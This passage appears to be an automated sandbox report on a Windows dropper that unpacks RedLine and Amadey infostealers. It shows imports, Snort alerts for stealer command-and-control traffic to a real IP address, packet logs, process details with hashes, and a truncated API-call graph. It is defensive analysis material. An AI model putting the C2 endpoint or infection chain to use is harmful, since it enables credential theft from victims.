                                                                                                                                                                                                                                              RT_RCDATA0xef4200x4dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4240xcdataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4300x4dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4340x6dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef43c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4440x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                              RT_GROUP_ICON0xef44c0xbcdataEnglishUnited States
                                                                                                                                                                                                                                              RT_VERSION0xef5080x408dataEnglishUnited States
                                                                                                                                                                                                                                              RT_VERSION0xef9100x410dataRussianRussia
                                                                                                                                                                                                                                              RT_MANIFEST0xefd200x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                              ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                              KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                              GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                              USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                              msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                                              Cabinet.dll
                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                                                              RussianRussia

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              193.233.20.13192.168.2.34136497022043234 02/15/23-21:48:41.150000TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              192.168.2.3193.233.20.134970241362043233 02/15/23-21:48:39.233243TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              192.168.2.3193.233.20.134970241362043231 02/15/23-21:48:58.203132TCP2043231ET TROJAN Redline Stealer TCP CnC Activity497024136192.168.2.3193.233.20.13

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:38.600676060 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:38.623109102 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:38.623279095 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:39.233242989 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:39.255796909 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:39.306426048 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:41.127048969 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:41.150000095 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:41.197262049 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:52.214342117 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:52.240160942 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:52.240191936 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:52.240212917 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:52.240366936 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.211184978 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.234004021 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.276495934 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.281729937 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.304958105 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.354614973 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.713612080 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.736506939 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.776597023 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.953632116 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.976582050 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:54.986613989 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.009938955 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.057764053 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.107716084 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.130172014 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.130750895 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.182753086 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.220614910 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.243496895 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.251611948 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.274276018 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.276335001 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.298976898 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.354659081 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.507668018 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.530920029 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.543175936 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.565224886 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.589593887 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.635943890 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.706798077 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.729424953 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.730022907 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.776588917 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.836627960 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.859600067 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.861146927 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.883913040 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.932890892 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.952173948 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:55.975255966 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:56.026592970 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.133286953 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.155745029 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.156270027 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.178423882 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.201369047 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.203131914 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.225924969 CET413649702193.233.20.13192.168.2.3
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.276803970 CET497024136192.168.2.3193.233.20.13
                                                                                                                                                                                                                                              Feb 15, 2023 21:48:58.286381960 CET497024136192.168.2.3193.233.20.13

                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:21:48:09
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              Imagebase:0x50000
                                                                                                                                                                                                                                              File size:969728 bytes
                                                                                                                                                                                                                                              MD5 hash:33F01DC275FFA0C5989F8630EB4279B5
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                              Start time:21:48:09
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              Imagebase:0x20000
                                                                                                                                                                                                                                              File size:742912 bytes
                                                                                                                                                                                                                                              MD5 hash:4C0E7D70D851B36C6338565474276043
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:21:48:09
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                              File size:551936 bytes
                                                                                                                                                                                                                                              MD5 hash:57EB0A896C2D871FDCCB5F4A5765F84D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:21:48:10
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              Imagebase:0x10e0000
                                                                                                                                                                                                                                              File size:206848 bytes
                                                                                                                                                                                                                                              MD5 hash:169FAA6C3CA7D213D20BDC00810116B8
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:21:48:11
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                                                                                                                                                                                                                                              Imagebase:0xf20000
                                                                                                                                                                                                                                              File size:11264 bytes
                                                                                                                                                                                                                                              MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:21:48:18
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:21:48:22
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                                                                                                                                                                                                                                              Imagebase:0x1e0000
                                                                                                                                                                                                                                              File size:179200 bytes
                                                                                                                                                                                                                                              MD5 hash:DD0C9E110C68CE1FA5308979EF718F7B
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:21:48:27
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:21:48:35
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:21:48:44
                                                                                                                                                                                                                                              Start date:15/02/2023
                                                                                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                              Imagebase:0x7ff7d8f80000
                                                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:28.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:26.8%
                                                                                                                                                                                                                                                Total number of Nodes:960
                                                                                                                                                                                                                                                Total number of Limit Nodes:25
                                                                                                                                                                                                                                                execution_graph 2196 56f40 SetUnhandledExceptionFilter 2197 54cc0 GlobalFree 3119 54200 3120 5421e 3119->3120 3121 5420b SendMessageA 3119->3121 3121->3120 3122 53100 3123 53111 3122->3123 3124 531b0 3122->3124 3126 53149 GetDesktopWindow 3123->3126 3130 5311d 3123->3130 3125 531b9 SendDlgItemMessageA 3124->3125 3128 53141 3124->3128 3125->3128 3132 543d0 6 API calls 3126->3132 3127 53138 EndDialog 3127->3128 3130->3127 3130->3128 3133 54463 SetWindowPos 3132->3133 3135 56ce0 4 API calls 3133->3135 3136 5315d 6 API calls 3135->3136 3136->3128 3137 54bc0 3138 54c05 3137->3138 3139 54bd7 3137->3139 3138->3139 3140 54c1b SetFilePointer 3138->3140 3140->3139 3141 530c0 3142 530de CallWindowProcA 3141->3142 3143 530ce 3141->3143 3144 530da 3142->3144 3143->3142 3143->3144 3145 563c0 3146 56407 3145->3146 3147 5658a CharPrevA 3146->3147 3148 56415 CreateFileA 3147->3148 3149 56448 WriteFile 3148->3149 3150 5643a 3148->3150 3151 56465 CloseHandle 3149->3151 3153 56ce0 4 API calls 3150->3153 3151->3150 3154 5648f 3153->3154 3155 56c03 3156 56c17 _exit 3155->3156 3157 56c1e 3155->3157 3156->3157 3158 56c27 _cexit 3157->3158 3159 56c32 3157->3159 3158->3159 2198 54ad0 2206 53680 2198->2206 2201 54aee WriteFile 2203 54b14 2201->2203 2204 54b0f 2201->2204 2202 54ae9 2203->2204 2205 54b3b SendDlgItemMessageA 2203->2205 2205->2204 2207 53691 MsgWaitForMultipleObjects 2206->2207 2208 536a9 PeekMessageA 2207->2208 2209 536e8 2207->2209 2208->2207 2210 536bc 2208->2210 2209->2201 2209->2202 2210->2207 2210->2209 2211 536c7 DispatchMessageA 2210->2211 2212 536d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 54cd0 2214 54cf4 2213->2214 2215 54d0b 2213->2215 2216 54d02 2214->2216 2217 54b60 FindCloseChangeNotification 2214->2217 2215->2216 2219 54dcb 2215->2219 2222 54d25 2215->2222 2270 56ce0 2216->2270 2217->2216 2220 54dd4 SetDlgItemTextA 2219->2220 2223 54de3 2219->2223 2220->2223 2221 54e95 2222->2216 2236 54c37 2222->2236 2223->2216 2244 5476d 2223->2244 2227 54e38 2227->2216 2253 54980 2227->2253 2232 54e64 2261 547e0 LocalAlloc 2232->2261 2235 54e6f 2235->2216 2237 54c4c DosDateTimeToFileTime 2236->2237 2239 54c88 2236->2239 2238 54c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 54c70 SetFileTime 2238->2240 2239->2216 2241 54b60 2239->2241 2240->2239 2242 54b92 FindCloseChangeNotification 2241->2242 2243 54b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 566ae GetFileAttributesA 2244->2275 2246 5477b 2246->2227 2247 547cc SetFileAttributesA 2249 547db 2247->2249 2249->2227 2252 547c2 2252->2247 2254 54990 2253->2254 2255 549a5 2254->2255 2256 549c2 lstrcmpA 2254->2256 2257 544b9 20 API calls 2255->2257 2258 549ba 2256->2258 2259 54a0e 2256->2259 2257->2258 2258->2216 2258->2232 2259->2258 2341 5487a 2259->2341 2262 547f6 2261->2262 2264 5480f 2261->2264 2263 544b9 20 API calls 2262->2263 2269 5480b 2263->2269 2264->2264 2265 5481b LocalAlloc 2264->2265 2266 54831 2265->2266 2265->2269 2267 544b9 20 API calls 2266->2267 2268 54846 LocalFree 2267->2268 2268->2269 2269->2235 2271 56ce8 2270->2271 2272 56ceb 2270->2272 2271->2221 2354 56cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2272->2354 2274 56e26 2274->2221 2276 54777 2275->2276 2276->2246 2276->2247 2277 56517 FindResourceA 2276->2277 2278 56536 LoadResource 2277->2278 2279 5656b 2277->2279 2278->2279 2280 56544 DialogBoxIndirectParamA FreeResource 2278->2280 2284 544b9 2279->2284 2280->2279 2283 547b1 2280->2283 2283->2247 2283->2249 2283->2252 2285 544fe LoadStringA 2284->2285 2286 5455a 2284->2286 2287 54527 2285->2287 2288 54562 2285->2288 2290 56ce0 4 API calls 2286->2290 2289 5681f 10 API calls 2287->2289 2294 545c9 2288->2294 2299 5457e 2288->2299 2291 5452c 2289->2291 2292 54689 2290->2292 2293 54536 MessageBoxA 2291->2293 2325 567c9 2291->2325 2292->2283 2293->2286 2296 54607 LocalAlloc 2294->2296 2297 545cd LocalAlloc 2294->2297 2296->2286 2309 545c4 2296->2309 2297->2286 2302 545f3 2297->2302 2299->2299 2301 54596 LocalAlloc 2299->2301 2301->2286 2305 545af 2301->2305 2306 5171e _vsnprintf 2302->2306 2303 5462d MessageBeep 2313 5681f 2303->2313 2331 5171e 2305->2331 2306->2309 2309->2303 2310 54645 MessageBoxA LocalFree 2310->2286 2311 567c9 EnumResourceLanguagesA 2311->2310 2314 56857 GetVersionExA 2313->2314 2315 56940 2313->2315 2318 5687c 2314->2318 2324 5691a 2314->2324 2316 56ce0 4 API calls 2315->2316 2317 5463b 2316->2317 2317->2310 2317->2311 2319 568a5 GetSystemMetrics 2318->2319 2318->2324 2320 568b5 RegOpenKeyExA 2319->2320 2319->2324 2321 568d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 5690c 2321->2322 2321->2324 2335 566f9 2322->2335 2324->2315 2326 56803 2325->2326 2327 567e2 2325->2327 2326->2293 2339 56793 EnumResourceLanguagesA 2327->2339 2329 567f5 2329->2326 2340 56793 EnumResourceLanguagesA 2329->2340 2332 5172d 2331->2332 2333 5173d _vsnprintf 2332->2333 2334 5175d 2332->2334 2333->2334 2334->2309 2336 5670f 